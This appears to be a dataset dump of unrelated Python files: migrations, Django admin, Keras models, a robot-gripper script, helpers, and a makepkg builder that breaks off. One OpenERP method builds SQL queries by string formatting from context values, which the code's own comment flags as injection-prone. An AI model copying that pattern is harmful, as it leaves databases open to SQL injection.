text stringlengths 8 6.05M |
|---|
def read_V_table(fileName):
    """Read an integer table from ``wilxdata/<fileName>``.

    Each line is one row; cells are separated by ';'.  Spaces and newlines
    inside a cell are stripped, and empty cells are skipped.

    Fix: the file is now closed deterministically via ``with`` (the original
    leaked the handle), and the unused line counter was removed.
    """
    table = []
    with open("wilxdata/" + fileName) as f:
        for line in f:
            cells = (s.replace("\n", "").replace(" ", "") for s in line.split(";"))
            table.append([int(c) for c in cells if c != ""])
    return table
def read_P_table(fileName):
    """Read a float table from ``wilxdata/<fileName>``.

    Same format as read_V_table (';'-separated rows) but cells are parsed
    as floats (probabilities).

    Fix: the file is now closed deterministically via ``with`` (the original
    leaked the handle), and the unused line counter was removed.
    """
    table = []
    with open("wilxdata/" + fileName) as f:
        for line in f:
            cells = (s.replace("\n", "").replace(" ", "") for s in line.split(";"))
            table.append([float(c) for c in cells if c != ""])
    return table
def write_V_table(table, vValuesFileName, verbose = False):
    """Persist an integer table under ``wilxdata/``; each cell ends with '; '.

    Assumes a rectangular table (column count taken from the first row).
    """
    row_count = len(table)
    col_count = len(table[0])
    with open("wilxdata/" + vValuesFileName, 'w') as out:
        for row in range(row_count):
            for col in range(col_count):
                out.write(str(table[row][col]))
                out.write("; ")
            out.write("\n")
            # progress heartbeat every 10 rows when requested
            if verbose and row % 10 == 0:
                print(row)
    if verbose:
        print("File created")
def write_P_table(table, fileName, verbose = False):
    """Persist a probability table under ``wilxdata/``; cells separated by ';'.

    Assumes a rectangular table (column count taken from the first row).
    """
    row_count = len(table)
    col_count = len(table[0])
    with open("wilxdata/" + fileName, 'w') as out:
        for row in range(row_count):
            for col in range(col_count):
                out.write(str(table[row][col]))
                out.write(";")
            out.write("\n")
            # progress heartbeat every 10 rows when requested
            if verbose and row % 10 == 0:
                print(row)
    if verbose:
        print("File created")
def show_V_table(table, width = 4):
    """Pretty-print a V table with a header row running from -k to +k.

    *width* is the fixed column width used for every printed value.

    Fix: replaced the C-style ``(int)(...)`` cast with idiomatic floor
    division (same result, no callable-cast trick).
    """
    nSize = len(table)
    kSize = len(table[0]) // 2  # half-width of the symmetric header
    for n in range(-kSize, kSize + 1):
        print('{0: {width}}'.format(n, width=width), end='')
    print()
    for n in range(nSize):
        for T0 in range(kSize * 2 + 1):
            print('{0: {width}}'.format(table[n][T0], width=width), end='')
        print()
def show_P_table(table, width = 10):
    """Pretty-print a probability table with a 0..k-1 column header.

    *width* is the fixed column width used for every printed value.
    """
    row_total = len(table)
    col_total = len(table[0])
    # header: column indices
    header = ''.join('{0: {width}}'.format(c, width=width) for c in range(col_total))
    print(header)
    # body: one formatted line per row
    for r in range(row_total):
        line = ''.join('{0: {width}}'.format(table[r][c], width=width) for c in range(col_total))
        print(line)
|
"""empty message
Revision ID: bcf2045c4e06
Revises: fd9dff883afd
Create Date: 2018-10-28 10:47:16.732679
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bcf2045c4e06'
down_revision = 'fd9dff883afd'
branch_labels = None
depends_on = None
def upgrade():
    """Create the field_team table and re-key espn/shark projections onto it."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('field_team',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=32), nullable=True),
    sa.Column('espn_code', sa.String(length=8), nullable=True),
    sa.Column('espn_id', sa.Integer(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    # replace free-text player/team columns with ids + an FK to field_team
    op.add_column('espn_projections', sa.Column('player_id', sa.Integer(), nullable=False))
    op.add_column('espn_projections', sa.Column('player_name', sa.String(length=64), nullable=True))
    op.add_column('espn_projections', sa.Column('team_id', sa.Integer(), nullable=True))
    # NOTE: constraint name None lets the backend auto-name the FK; the
    # matching drop_constraint(None, ...) in downgrade() relies on a naming
    # convention being configured — verify before running downgrades.
    op.create_foreign_key(None, 'espn_projections', 'field_team', ['team_id'], ['id'])
    op.drop_column('espn_projections', 'team')
    op.drop_column('espn_projections', 'id')
    op.drop_column('espn_projections', 'player')
    op.add_column('shark_projections', sa.Column('player_name', sa.String(length=64), nullable=False))
    op.add_column('shark_projections', sa.Column('position', sa.String(length=8), nullable=True))
    op.add_column('shark_projections', sa.Column('team_id', sa.Integer(), nullable=False))
    op.create_foreign_key(None, 'shark_projections', 'field_team', ['team_id'], ['id'])
    op.drop_column('shark_projections', 'team')
    op.drop_column('shark_projections', 'player')
    # ### end Alembic commands ###
def downgrade():
    """Reverse upgrade(): restore text columns and drop field_team."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('shark_projections', sa.Column('player', sa.VARCHAR(length=64), autoincrement=False, nullable=False))
    op.add_column('shark_projections', sa.Column('team', sa.VARCHAR(length=8), autoincrement=False, nullable=False))
    # NOTE: dropping a constraint by name None requires a configured naming
    # convention (or PostgreSQL-style reflection) — confirm before use.
    op.drop_constraint(None, 'shark_projections', type_='foreignkey')
    op.drop_column('shark_projections', 'team_id')
    op.drop_column('shark_projections', 'position')
    op.drop_column('shark_projections', 'player_name')
    op.add_column('espn_projections', sa.Column('player', sa.VARCHAR(length=64), autoincrement=False, nullable=True))
    op.add_column('espn_projections', sa.Column('id', sa.INTEGER(), autoincrement=False, nullable=False))
    op.add_column('espn_projections', sa.Column('team', sa.VARCHAR(length=8), autoincrement=False, nullable=True))
    op.drop_constraint(None, 'espn_projections', type_='foreignkey')
    op.drop_column('espn_projections', 'team_id')
    op.drop_column('espn_projections', 'player_name')
    op.drop_column('espn_projections', 'player_id')
    op.drop_table('field_team')
    # ### end Alembic commands ###
|
from django.contrib import admin
from .models import *
# добавить действие в окно выполнить действие
# Admin bulk actions for the "run action" dropdown in the change list.
def make_payed(modeladmin,request,queryset):
    # status=3 — mark the selected orders as paid
    queryset.update (status=3)
make_payed.short_description = "Пометить как оплаченные"
def make_do(modeladmin,request,queryset):
    # status=2 — mark the selected orders as completed
    queryset.update (status=2)
make_do.short_description = "Пометить как выполнен"
def make_new(modeladmin,request,queryset):
    # status=4 — mark the selected orders as updated
    queryset.update (status=4)
make_new.short_description = "Пометить как обновленный"
class StatusAdmin (admin.ModelAdmin):
    # show every model field as a column in the admin list view
    list_display = [field.name for field in Status._meta.fields]
    class Meta:
        model = Status
# Register your models here.
admin.site.register(Status,StatusAdmin)
class ProductInOrderInline(admin.TabularInline):
    # inline editor for order line-items on the order admin page
    model = ProductInOrderModel
    extra = 0  # no blank extra rows by default
# product in basket
# product in basket
class ProductInBasketAdmin (admin.ModelAdmin):
    # show every model field as a column in the admin list view
    list_display = [field.name for field in ProductInBasketModel._meta.fields]
    class Meta:
        model = ProductInBasketModel
# Register your models here.
admin.site.register(ProductInBasketModel,ProductInBasketAdmin)
class OrderModelAdmin (admin.ModelAdmin):
    # explicit column list for orders (the all-fields variant is kept below
    # commented out for reference)
    # list_display = [field.name for field in Order._meta.fields]
    list_display = ('id','status','total_price','customer_surname','customer_name','customer_email','customer_tel','customer_address','token','comments','created')
    # list_filter = ['status']
    # search_fields = ["id","total_price"]
    inlines = [ProductInOrderInline]
    # bulk status-change actions defined above
    actions = [make_payed,make_do,make_new]
    # actions = [make_do]
    class Meta:
        model = OrderModel
# Register your models here.
admin.site.register(OrderModel,OrderModelAdmin)
class ProductInOrderModelAdmin (admin.ModelAdmin):
    # show every model field as a column in the admin list view
    list_display = [field.name for field in ProductInOrderModel._meta.fields]
    class Meta:
        model = ProductInOrderModel
# Register your models here.
admin.site.register(ProductInOrderModel,ProductInOrderModelAdmin)
|
import numpy as np
import matplotlib.pyplot as plt
import math
def tail_prob(chi,t):
    """Empirical tail probability Pr(X - mean(X) > t_i) for each threshold in *t*.

    *chi* is a 1-D numpy array of samples; returns a list of floats,
    one per threshold (sample mean is subtracted, i.e. centred at 0).
    """
    centre = np.mean(chi)
    total = 1.0 * len(chi)
    return [chi[chi > (threshold + centre)].shape[0] / total for threshold in t]
# ---------------------------------------------------------------------------
# Empirically compare the tail of a chi-square(n) variable against a
# reference Gaussian with matching variance (2n).
# ---------------------------------------------------------------------------
n = 3      # degrees of freedom of the chi-square
k = 10000  # number of Monte-Carlo samples
# FIX: np.linspace requires an integer sample count; passing the float 1e4
# raises "TypeError: 'float' object cannot be interpreted as an integer"
# on NumPy >= 1.18.
t = np.linspace(0, 50, int(1e4))
data = np.zeros((k,))
###########################################################
#chi2 = Sigma(Xi^2) Xi -> N(0,1)
###########################################################
# data generation empirically: sum of n squared standard normals
for i in range(n):
    x = np.random.normal(0, 1, (k,))
    data = data + x**2
tail_probs = np.array(tail_prob(data, t))  # computing the tail probability
gaussian = np.random.normal(0, np.sqrt(2 * n), (k,))
bound = np.array(tail_prob(gaussian, t))  # computing the bound
fig = plt.figure()
plt.plot(t, tail_probs, 'b', label='Chi-square')
plt.plot(t, bound, 'r', label='Reference Gaussian')
labels = ['Chi-square', 'Reference Gaussian']
plt.legend(labels)
fig.suptitle('N = ' + str(n))
plt.xlabel('t')
plt.ylabel('Pr({X-u >t})')
plt.show()
|
# Generated by Django 2.2.5 on 2019-11-29 14:13
from django.db import migrations
class Migration(migrations.Migration):
    # Renames trip relation fields from plural to singular
    # (hotels -> hotel, transportations -> transportation).
    dependencies = [
        ('trips', '0007_auto_20191128_2103'),
    ]
    operations = [
        migrations.RenameField(
            model_name='trip',
            old_name='hotels',
            new_name='hotel',
        ),
        migrations.RenameField(
            model_name='trip',
            old_name='transportations',
            new_name='transportation',
        ),
    ]
|
#!/usr/bin/python
#Stop gripper during moving.
from dxl_util import *
from _config import *
import time
import math
import numpy as np
#Setup the device
# NOTE: Python 2 script (print statements, raw_input); drives a Dynamixel
# servo over a serial link, so it has no meaningful return value.
dxl= TDynamixel1(DXL_TYPE,dev=DEV)
dxl.Id= DXL_ID
dxl.Baudrate= BAUDRATE
dxl.Setup()
dxl.EnableTorque()
#Move to initial position
p_start= 2100
dxl.MoveTo(p_start)
time.sleep(0.5)  #wait .5 sec
print 'Current position=',dxl.Position()
print 'Type current position, and then hold the gripper to prevent moving'
p_trg= int(raw_input('type target: '))
# non-blocking move so we can watch the position while the user holds it
dxl.MoveTo(p_trg,blocking=False)
for i in range(7):
    time.sleep(0.1)  #wait 0.1 sec
    print 'Current position=',dxl.Position()
# stop: re-target to wherever the gripper actually is now
print 'Reset the target position to the current position',dxl.Position()
dxl.MoveTo(dxl.Position(),blocking=True)
#dxl.DisableTorque()
dxl.Quit()
|
import random
import tensorflow as tf
import numpy as np
import pandas as pd
def read_dataset(filename, lines):
    """Load up to *lines* rows of a word/language CSV and one-hot encode it.

    Column 0 holds words, column 1 holds language labels.  Returns
    (train_x, train_y, test_x, test_y) as numpy arrays, split 80/20 in
    file order (no shuffling).  Side effects: encode_words/encode_langs
    mutate the module globals longest_word_len, char_to_map, map_to_char
    and languages.
    """
    train_test_ratio = 0.8
    df = pd.read_csv(filename, nrows=lines)
    x_matrix = df[df.columns[0]].values
    x_vals = encode_words(x_matrix)
    train_x = x_vals[:int(lines * train_test_ratio)]
    test_x = x_vals[int(lines * train_test_ratio):]
    y_matrix = df[df.columns[1]].values
    y_vals = encode_langs(y_matrix)
    train_y = y_vals[:int(lines * train_test_ratio)]
    test_y = y_vals[int(lines * train_test_ratio):]
    print("Finished reading", filename)
    return np.asarray(train_x), np.asarray(train_y), np.asarray(test_x), np.asarray(test_y)
def decode_word(one_hot_word):
    """Invert the one-hot encoding produced by encode_words.

    Each row of *one_hot_word* encodes one character; all-zero rows
    (padding) contribute nothing.
    """
    characters = []
    for row in one_hot_word:
        for position, flag in enumerate(row):
            if flag == 1:
                characters.append(chr(map_to_char[position]))
                break
    return "".join(characters)
def encode_words(words):
    """One-hot encode *words*, growing the global character maps on the fly.

    Mutates module globals longest_word_len, char_to_map and map_to_char.
    Returns a list of longest_word_len x letter_count 0/1 matrices (one per
    word, padded with all-zero rows).
    NOTE(review): letter_count restarts at 0 on every call while
    char_to_map persists — safe only because this runs once per process;
    confirm before reusing.
    """
    letter_count = 0
    global longest_word_len
    global char_to_map
    global map_to_char
    out = []
    c = 0  # 1-based row counter, used only for error reporting
    for word in words:
        current_word = []
        c += 1
        try:
            for letter in word:
                if len(word) > longest_word_len:
                    longest_word_len = len(word)
                if ord(letter) not in char_to_map:
                    # first sighting of this character: assign the next index
                    char_to_map[ord(letter)] = letter_count
                    map_to_char[letter_count] = ord(letter)
                    current_word.append(letter_count)
                    letter_count += 1
                else:
                    current_word.append(char_to_map[ord(letter)])
        except TypeError:
            # non-string cell (presumably NaN from pandas) — keep an empty word
            print("Unreadable word at line " + str(c))
        out.append(current_word)
    # second pass: expand each index list into a fixed-size one-hot matrix
    for word_idx in range(len(out)):
        word = out[word_idx]
        one_hot_word = []
        for i in range(longest_word_len):
            one_hot_word.append([0] * letter_count)
        for i in range(len(word)):
            one_hot_word[i][word[i]] = 1
        out[word_idx] = one_hot_word
    return out
def encode_langs(arr):
    """One-hot encode language labels, registering new ones in `languages`.

    Label indices are assigned in first-seen order; the module-level
    `languages` list is appended to for every new label.
    """
    labels = {}
    indices = []
    for item in arr:
        if item not in labels:
            labels[item] = len(labels)
            languages.append(item)
        indices.append(labels[item])
    width = len(labels)
    encoded = []
    for index in indices:
        row = [0] * width
        row[index] = 1
        encoded.append(row)
    return encoded
def encode_user_word(word):
    """One-hot encode a user-typed word with the learned character mapping.

    Characters never seen during training are reported and skipped; the
    result is a longest_word_len x num_letters 0/1 grid.
    """
    grid = [[0] * num_letters for _ in range(longest_word_len)]
    for position, character in enumerate(word):
        code = ord(character)
        if code not in char_to_map:
            print("Character", character, "not recognized")
            continue  # skip unrecognized chars
        grid[position][char_to_map[code]] = 1
    return grid
def create_layers(i_shape):
    """Return the classifier layer stack: flatten -> 2 ReLU blocks -> softmax.

    Output width equals the number of known languages.
    """
    stack = [tf.keras.layers.Flatten(input_shape=i_shape)]
    # Alternative recurrent architecture kept for reference:
    # tf.keras.layers.Embedding(num_letters, 50),
    # tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(100)),
    stack.append(tf.keras.layers.Dense(700, activation=tf.nn.relu))
    stack.append(tf.keras.layers.Dropout(0.2))
    stack.append(tf.keras.layers.Dense(200, activation=tf.nn.relu))
    stack.append(tf.keras.layers.Dropout(0.2))
    stack.append(tf.keras.layers.Dense(len(languages), activation=tf.nn.softmax))
    return stack
def create_model(x, y):
    """Build, compile and fit the language classifier on (x, y).

    Reads the module globals longest_word_len and num_letters to size the
    input; trains for 7 epochs with categorical cross-entropy.
    """
    global longest_word_len
    global num_letters
    layers = create_layers((longest_word_len, num_letters))
    m = tf.keras.models.Sequential()
    for layer in layers:
        m.add(layer)
    m.compile(
        optimizer='adam',
        loss="categorical_crossentropy",
        metrics=['accuracy'])
    m.fit(x, y, epochs=7)
    return m
def guess_words_from_data(model, x, y):
    """Print the model's prediction vs. the true label for the first 5 samples."""
    num = 5
    w = x[:num]   # one-hot encoded words
    l = y[:num]   # one-hot encoded labels
    for i in range(num):
        p = model.predict(np.asarray([w[i]]))
        d = decode_word(w[i])
        a = l[i]
        print("The model predicts:", d, "-", languages[p.argmax()] + ". The actual language is", languages[a.argmax()])
def guess_words_from_input(model):
    """Interactive loop: classify words typed by the user until "quit"."""
    i = input("Enter a word \n")
    while i != "quit":
        one_hot_word = np.asarray([encode_user_word(i)])
        prediction = model.predict(one_hot_word)
        print(languages)
        print(prediction)
        print("The model predicts: ", i, "-", languages[prediction.argmax()])
        i = input()
def game(model, x, y):
    """Interactive game: user and model guess the language of random words.

    Shows a word decoded from *x*, reads the player's guess, compares both
    the player's and the model's guess against the true label from *y*,
    and keeps a running score.  Type "quit" to stop.

    Fixes: the loop condition used ``is not "quit"`` — an identity
    comparison against a string literal, which is implementation-dependent
    and raises a SyntaxWarning on modern Python — now ``!=``.  The
    duplicated pick-word/prompt code was also folded into the loop.
    """
    player_score = 0
    bot_score = 0
    while True:
        idx = random.randrange(0, len(x))
        one_hot_word = x[idx]
        decoded_word = decode_word(one_hot_word)
        correct = languages[y[idx].argmax()]
        i = input(decoded_word)
        if i == "quit":
            break
        bot_guess = languages[model.predict(np.asarray([one_hot_word])).argmax()]
        print("You guessed", i, "while the bot guessed", bot_guess)
        print("The actual answer is", correct)
        if bot_guess == correct:
            bot_score += 1
        if i == correct:
            player_score += 1
        print("Your score:", player_score, " bot score:", bot_score)
if __name__ == "__main__":
    # Globals shared with the encode/decode helpers above.
    data_length = 30000      # max CSV rows to load
    longest_word_len = 0     # grown by encode_words
    languages = []           # label list, grown by encode_langs
    map_to_char = {}         # one-hot index -> ord(char)
    char_to_map = {}         # ord(char) -> one-hot index
    # requested_dataset = input("Enter the dataset name to use \n")
    requested_dataset = "EasternEurope"
    p = "data/" + requested_dataset + ".csv"
    x_train, y_train, x_test, y_test = read_dataset(p, data_length)
    num_letters = len(map_to_char)
    print(languages)
    print(num_letters, "letters - longest word is", longest_word_len, "letters long")
    model = create_model(x_train, y_train)
    model.evaluate(x_test, y_test)
    # guess_words_from_input(model)
    game(model, x_train, y_train)
|
from setuptools import setup
# Packaging metadata for the ditk toolkit (CSCI 548 course project).
setup(name='ditk',
      version='alpha',
      description='CSCI 548 Project- Data Integration Toolkit',
      url='https://github.com/HaozheGuAsh/CSCI548-Relation-Extraction',
      author=' ',
      license='MIT',
      packages=['ditk'],
      zip_safe=False)
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from datetime import datetime
class oper_cuota_generation(osv.osv):
    """Wizard-style model that creates 'oper_cuota' rows for active contracts,
    filtered by institution / collector / member taken from the context."""
    _name = 'oper.cuota.generation'
    _columns = {
        'period_id': fields.many2one('account.period','Periodo'),
        'socio_id': fields.many2one('res.partner', 'Socio'),
        'recaudador_id': fields.many2one('oper.recaudador', 'Recaudador'),
        'partner_id': fields.many2one('res.partner', 'Institucion', domain=[('is_institucion','=',True)]),
    }
    def generar_couta(self, cr, uid, ids, context=None):
        # SECURITY NOTE(review): all SQL below is assembled with '%' string
        # formatting from context values — it should use cr.execute()
        # parameter binding to avoid SQL injection. Left unchanged here.
        contracts=''
        date=''
        sql=''
        amount=0
        no_contracts=True  # flips to False as soon as one contract matches
        date = datetime.now()
        # date literal in d-m-Y form, already quoted for the insert below
        date_short= "'"+str(date.day)+'-'+str(date.month)+'-'+str(date.year)+"'"
        if not context['partner_id'] and not context['recaudador_id']:
            raise osv.except_osv(('Aviso!'),('Debe seleccionar alguna Institución o Recaudador'))
        sql=("""select id, amount_cuotas, q_cuotas, product_id, socios_id, recaudador_id, partner_id
from oper_contrato where activo=True and date_start <= '%s'""" % str(date))
        # optional filters, appended only when present in the context
        if context['partner_id']: sql += (' and partner_id = % s' % str(context['partner_id']))
        if context['recaudador_id']: sql += (' and recaudador_id = % s' % str(context['recaudador_id']))
        if context['socio_id']: sql += (' and socios_id = % s' % str(context['socio_id']))
        cr.execute(sql)
        for i in cr.fetchall():
            no_contracts=False
            amount= i[1]
            # add the sum of annex amounts attached to this contract
            cr.execute('select sum(mount) from oper_contrato_anexo where id_anexo=%d' % i[0])
            anexos=cr.fetchone()
            if anexos and anexos[0]:
                amount+=anexos[0]
            cr.execute("""insert into oper_cuota
(amount,n_cuota,servicio_id,fecha_emision,period_id,socio_id,recaudador_id,partner_id, contrato_id)
values(%d,%d,%d,%s,%d,%d,%d,%d,%d)
""" % (amount,i[2],i[3],date_short,context['period_id'],i[4],i[5],i[6],i[0]))
        if no_contracts: raise osv.except_osv(('Aviso!'),('No hay contratos para su seleccion'))
        return True
oper_cuota_generation() |
# Train/test split: fraction of the data used for training.
training_percent = 0.7
testing_percent = 1 - training_percent
# Number of lagged observations fed to the model as features.
previous_data_points = 3
# Selected currency (presumably filled in at runtime — confirm in caller).
currency = ""
currency_index = 0
# Dataset bookkeeping, populated after loading.
data_set_length = 0
training_set_length = 0
testing_set_length = 0
# ARIMA order (p, d, q) — zeros here look like placeholders; TODO confirm.
p = 0
d = 0
q = 0
# Neural-network training parameters.
epochs = 50
batch_size = 2
|
import tensorflow as tf
from tensorflow.keras.layers import Input, SimpleRNN, LSTM, GRU, Dense, Activation
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras import backend as K
def naive_RNNs(init, input_shape, mode='singal-layer'):
    """Build a SimpleRNN model (single- or three-layer stacked).

    input_shape: [timesteps, features] (batch dimension implied).
    The historic typo 'singal-layer' is kept as the default for backward
    compatibility; the correct spelling 'single-layer' is also accepted.
    """
    inputs = Input(shape=input_shape)
    if mode in ('singal-layer', 'single-layer'):
        x = SimpleRNN(init.RNNUnits)(inputs)
    else:
        # multi-layer: SimpleRNN with return_state yields (sequences, state)
        x, _ = SimpleRNN(init.RNNUnits, return_sequences=True, return_state=True)(inputs)
        x, _ = SimpleRNN(init.RNNUnits, return_sequences=True, return_state=True)(x)
        # last layer: keep the final state as the fixed-size representation
        _, x = SimpleRNN(init.RNNUnits, return_sequences=True, return_state=True)(x)
    outputs = Dense(init.FeatDims)(x)
    if init.task == 'classification':
        outputs = Activation('softmax')(outputs)
    model = Model(inputs=inputs, outputs=outputs)
    return model
def LSTMs(init, input_shape, mode='singal-layer'):
    """Build an LSTM model (single- or three-layer stacked).

    input_shape: [timesteps, features] (batch dimension implied).
    Fix: LSTM with return_state=True returns THREE tensors
    (sequences, state_h, state_c); the original unpacked only two, which
    raises ValueError at build time.  The spelling 'single-layer' is also
    accepted alongside the historic default 'singal-layer'.
    """
    inputs = Input(shape=input_shape)
    if mode in ('singal-layer', 'single-layer'):
        x = LSTM(init.RNNUnits)(inputs)
    else:
        # multi-layer: propagate the full sequence between layers
        x, _, _ = LSTM(init.RNNUnits, return_sequences=True, return_state=True)(inputs)
        x, _, _ = LSTM(init.RNNUnits, return_sequences=True, return_state=True)(x)
        # last layer: keep the final hidden state h as the representation
        _, x, _ = LSTM(init.RNNUnits, return_sequences=True, return_state=True)(x)
    outputs = Dense(init.FeatDims)(x)
    if init.task == 'classification':
        outputs = Activation('softmax')(outputs)
    model = Model(inputs=inputs, outputs=outputs)
    return model
def GRUs(init, input_shape, mode='singal-layer'):
    """Build a GRU model (single- or three-layer stacked).

    input_shape: [timesteps, features] (batch dimension implied).
    Fix: GRU with return_state=True returns TWO tensors (sequences, state);
    the original unpacked three, which raises ValueError at build time.
    The spelling 'single-layer' is also accepted alongside the historic
    default 'singal-layer'.
    """
    inputs = Input(shape=input_shape)
    if mode in ('singal-layer', 'single-layer'):
        x = GRU(init.RNNUnits)(inputs)
    else:
        # multi-layer: propagate the full sequence between layers
        x, _ = GRU(init.RNNUnits, return_sequences=True, return_state=True)(inputs)
        x, _ = GRU(init.RNNUnits, return_sequences=True, return_state=True)(x)
        # last layer: keep the final state as the fixed-size representation
        _, x = GRU(init.RNNUnits, return_sequences=True, return_state=True)(x)
    outputs = Dense(init.FeatDims)(x)
    if init.task == 'classification':
        outputs = Activation('softmax')(outputs)
    model = Model(inputs=inputs, outputs=outputs)
    return model
|
from functools import wraps
from natsort import natsorted, ns
import graphene
class OrderedList(graphene.List):
    """A graphene List field that also exposes ordering arguments.

    Always adds an 'order_direction' argument; adds 'order_by' only for
    element types other than String (plain strings sort by value).
    """
    def __init__(self, of_type, **kwargs):
        additional_kwargs = {
            'order_direction': graphene.String(),
        }
        if of_type != graphene.String:
            additional_kwargs['order_by'] = graphene.String()
        super().__init__(of_type, **additional_kwargs, **kwargs)
def sorting_func(items, order_direction, **kwargs):
    """Natural-sort *items* case-insensitively; descending when 'desc'."""
    descending = order_direction == 'desc'
    return natsorted(items, reverse=descending, alg=ns.IGNORECASE, **kwargs)
def ordered_case(func):
    """Decorator for resolvers: sort the result by the 'order_by' attribute.

    When 'order_by' is not supplied the resolved list is returned as-is.
    """
    @wraps(func)
    def func_wrapper(self, info, order_by=None, order_direction='asc', **kwargs):
        resolved = func(self, info, **kwargs)
        if order_by is None:
            return resolved
        return sorting_func(resolved, order_direction=order_direction,
                            key=lambda element: getattr(element, order_by))
    return func_wrapper
def ordered_strings(func):
    """Decorator for resolvers returning strings: natural-sort the result."""
    @wraps(func)
    def func_wrapper(self, info, order_direction='asc', **kwargs):
        resolved = func(self, info, **kwargs)
        return sorting_func(resolved, order_direction=order_direction)
    return func_wrapper
|
from typing import Iterator
def reduction(x):
    # type: (int) -> Iterator[int]
    """
    reduction sequence from n to 1 by either adding 1, subtracting 1, or dividing by 2
    proof:
    n | n mod 4 | path
    --|---------|----------------------
    1 | 1       | 1
    2 | 2       | 2 -> 1
    3 | 3       | 3 -> 2 -> 1
    4 | 0       | 4 -> 2 -> 1
    5 | 1       | 5 -> 4 -> 2 -> 1
    6 | 2       | 6 -> 3 -> 2 -> 1
    7 | 3       | 7 -> 8 -> 4 -> 2 -> 1
    8 | 0       | 8 -> 4 -> 2 -> 1
    The case when n is 3 is special.
    analysis:
    time complexity: O(log N)
    space complexity: O(1)
    """
    yield x
    while x > 1:
        r = x % 4
        if r in {0, 2}:
            # FIX: floor division — '/=' produced floats in Python 3,
            # contradicting the Iterator[int] contract and risking float
            # precision loss for very large n.
            x //= 2
        elif r == 1 or x == 3:
            x -= 1
        else:
            x += 1
        yield x
def answer(n):
    # type: (str) -> int
    """
    minimum number of operations to reduce n to 1 by either adding 1, subtracting 1, or dividing by 2
    """
    # count steps by walking the reduction sequence; the first yield is n
    # itself, hence the -1 starting point.
    steps = -1
    for _ in reduction(int(n)):
        steps += 1
    return steps
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2009 Francesco Piccinno
#
# Author: Francesco Piccinno <stack.box@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# TODO:
# - dependencies handling
# - for -git/-svn packages move the src folder to source/ instead dropping
# it and re-fetch the sources everytime
import os
import os.path
import re
import sys
import shutil
import glob
from optparse import OptionParser
from pylibs.utils import ConsoleP, foreach_pkgbuild
from pylibs.pkgbuild import PkgBuild
from subprocess import Popen, STDOUT, PIPE
SKEL = """# This file is autogenerated by pkg-builder
DLAGENTS=('ftp::/usr/bin/wget -c --passive-ftp -t 3 --waitretry=3 -O %o %u'
'http::/usr/bin/wget -c -t 3 --waitretry=3 -O %o %u'
'https::/usr/bin/wget -c -t 3 --waitretry=3 --no-check-certificate -O %o %u'
'rsync::/usr/bin/rsync -z %u %o'
'scp::/usr/bin/scp -C %u %o')
CARCH="i686"
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=i686 -mtune=generic -O2 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i686 -mtune=generic -O2 -pipe -fomit-frame-pointer"
MAKEFLAGS="-j%NCPU%"
BUILDENV=(fakeroot !distcc color ccache !xdelta)
OPTIONS=(strip docs libtool emptydirs zipman)
INTEGRITY_CHECK=(md5)
DOC_DIRS=(usr/{,share/}{info,doc,gtk-doc} opt/*/{info,doc,gtk-doc})
STRIP_DIRS=(bin lib sbin usr/{bin,lib,sbin,local/{bin,lib,sbin}} opt/*/{bin,lib,sbin})
PKGDEST="%PKGDEST%"
SRCDEST="%SRCDEST%"
PACKAGER="Francesco Piccinno <stack.box@gmail.com>"
BUILDSCRIPT='PKGBUILD'
PKGEXT='.pkg.tar.xz'
SRCEXT='.src.tar.xz'
DB_COMPRESSION='gz'
DB_CHECKSUMS=(md5)
# vim: set ft=sh ts=2 sw=2 et:
"""
OUTFILE = os.path.join(os.getenv("HOME", "/root"), ".makepkg.conf")
class Builder(ConsoleP):
    """Builds every PKGBUILD found under *src* and collects packages in *dst*.

    Writes a generated ~/.makepkg.conf so that makepkg drops built packages
    into *dst* and downloaded sources into *tmp*.  Python 2 era code;
    shells out heavily (makepkg, pacman, namcap).
    """
    def __init__(self, src, tmp, dst, nodeps=False, force=False, \
                 nonamcap=False):
        ConsoleP.__init__(self, 'pkgbuilder')
        self.built = 0    # count of successfully built packages
        self.failed = []  # names of packages whose build failed
        self.src, self.tmp, self.dst = os.path.abspath(src), \
                                       os.path.abspath(tmp), \
                                       os.path.abspath(dst)
        # We have to create a makepkg.conf file that contains
        # proper CFLAGS and PKGDEST, SRCDEST variable (dst, tmp)
        # and place under ~/.makepkg.conf
        mkp = SKEL.replace("%NCPU%", "3") \
                  .replace("%PKGDEST%", self.dst) \
                  .replace("%SRCDEST%", self.tmp)
        self.nodeps = nodeps
        self.nonamcap = nonamcap
        self.force = force
        f = open(OUTFILE, "w+")
        f.write(mkp)
        f.close()
    def build_all(self):
        """Build every package, then uninstall dependencies pulled in meanwhile."""
        # Remember the pacman log size so we can later detect packages that
        # were installed as build dependencies during this session.
        st_size = os.stat('/var/log/pacman.log').st_size
        for pkgdir in foreach_pkgbuild(self.src):
            rootdir = os.path.basename(pkgdir)
            if 'lkm-skel' in pkgdir:
                continue  # skeleton template, not a real package
            self.build_pkg(pkgdir)
